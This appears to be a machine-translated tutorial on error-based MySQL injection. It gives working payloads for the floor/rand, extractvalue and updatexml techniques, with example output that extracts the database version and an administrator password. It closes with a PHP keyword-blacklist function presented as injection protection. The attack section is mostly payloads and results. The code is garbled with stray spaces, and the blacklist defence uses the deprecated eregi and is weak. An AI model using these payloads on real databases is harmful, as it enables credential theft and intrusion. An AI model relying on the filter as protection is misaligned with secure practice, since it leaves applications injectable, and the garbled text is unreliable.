SQL database is the most vulnerable to website security injection. If you use dedecms, someone will often write SQL Injection statements in the search, your website is packed or poisoned. I will share with you how to use the three error reporting modes in mysql injection, hoping to help you.
1. floor Error
You can use the following code:
The Code is as follows: |
Copy code |
And select 1 from (select count (*), concat (version (), floor (rand (0) * 2) x from information_schema.tables group by x) ); And (select count (*) from (select 1 union select null union select! 1) x group by concat (select table_name from information_schema.tables limit 1), floor (rand (0) * 2 ))); |
Example:
First, perform a normal query:
The Code is as follows: |
Copy code |
Mysql> select * from article where id = 1; + ---- + ------- + --------- + | Id | title | content | + ---- + ------- + --------- + | 1 | test | do it | + ---- + ------- + --------- + |
If the input id has been injected, you can use the following statement to report an error.
The Code is as follows: |
Copy code |
Mysql> select * from article where id = 1 and (select 1 from (select count (*), concat (version (), floor (rand (0) * 2 )) x from information_schema.tables group by x) ); ERROR 1062 (23000): Duplicate entry '5. 1.33-community-log1 'for key'group _ key' |
We can see that the Mysql version is successfully published. If you need to query other data, you can query it by modifying the statement where version () is located.
For example, we need to query the administrator username and password:
The Code is as follows: |
Copy code |
Method1: Mysql> select * from article where id = 1 and (select 1 from (select count (*), concat (select pass from admin where id = 1 ), floor (rand (0) * 2) x from information_schema.tables group by x) ); ERROR 1062 (23000): Duplicate entry 'admin8881 'for key'group _ key' Method2: Mysql> select * from article where id = 1 and (select count (*) from (select 1 union select null union select! 1) x group by concat (select pass from admin limit 1), floor (rand (0) * 2 ))); ERROR 1062 (23000): Duplicate entry 'admin8881 'for key'group _ key' |
2. ExtractValue
The test statement is as follows:
The Code is as follows: |
Copy code |
And extractvalue (1, concat (0x5c, (select table_name from information_schema.tables limit 1 ))); |
Actual Testing Process
The Code is as follows: |
Copy code |
Mysql> select * from article where id = 1 and extractvalue (1, concat (0x5c, (select pass from admin limit 1 )));-- ERROR 1105 (HY000): XPATH syntax error: 'admin888' |
3. UpdateXml
Test statement
The Code is as follows: |
Copy code |
And 1 = (updatexml (1, concat (0x5e24, (select user (), 0x5e24), 1 )) |
Actual Testing Process
The Code is as follows: |
Copy code |
Mysql> select * from article where id = 1 and 1 = (updatexml (1, concat (0x5e24, (select pass from admin limit 1), 0x5e24), 1 )); ERROR 1105 (HY000): XPATH syntax error: '^ $ admin888 ^ $' |
One of the features of the above method is that the query statement is very long and we can limit the input length. This can also effectively filter SQL Injection statements, but I will share with you an anti-SQL Injection function.
1. function construction
The Code is as follows: |
Copy code |
/* Function Name: inject_check () Function function: checks whether submitted values contain SQL Injection characters to prevent injection and protect server security. Parameter: $ SQL _str: Submitted variable Return Value: Return detection result, true or false */ Function inject_check ($ SQL _str) { Return eregi ('select | insert | update | delete | '|/* | .. /|. // | union | into | load_file | outfile ', $ SQL _str); // Filter }
|
2. Example of function usage
The Code is as follows: |
Copy code |
<? Php If (inject_check ($ _ GET ['id']) { Exit ('the data you submitted is invalid. Please check it and submit it again! '); } Else { $ Id = $ _ GET ['id']; // Process data .................. } ?> |